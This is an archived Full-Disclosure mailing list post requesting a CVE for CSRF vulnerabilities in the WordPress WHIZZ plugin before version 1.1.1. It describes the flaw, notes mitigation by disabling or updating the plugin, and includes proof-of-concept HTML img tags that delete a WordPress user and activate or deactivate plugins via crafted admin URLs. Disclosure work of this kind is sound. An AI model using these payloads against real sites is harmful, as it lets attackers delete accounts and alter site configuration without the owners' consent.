lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <PS1PR04MB100116EC516403273491D265DF0C0@PS1PR04MB1001.apcprd04.prod.outlook.com>
Date: Fri, 7 Apr 2017 06:27:16 +0000
From: Wester 95 <evilzyzeng@...look.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE Request:Multiple CSRF in WordPress WHIZZ allow attackers
 to delete any wordpress users and change plugins status

Hi team,

I would like to request one CVE id, thank you!




Details


======


Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/



=======











Description
================
Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status




POC:



========








include in the page ,then attack will occur:








delete user:








<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">








active or disactive plugins:








<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">








<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">








Mitigations
================
Disable the plugin until a new version is released that fixes this bug.








FIX:



==========








https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically














Best regards,



Zhiyang Zeng of Tencent security platform department








_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ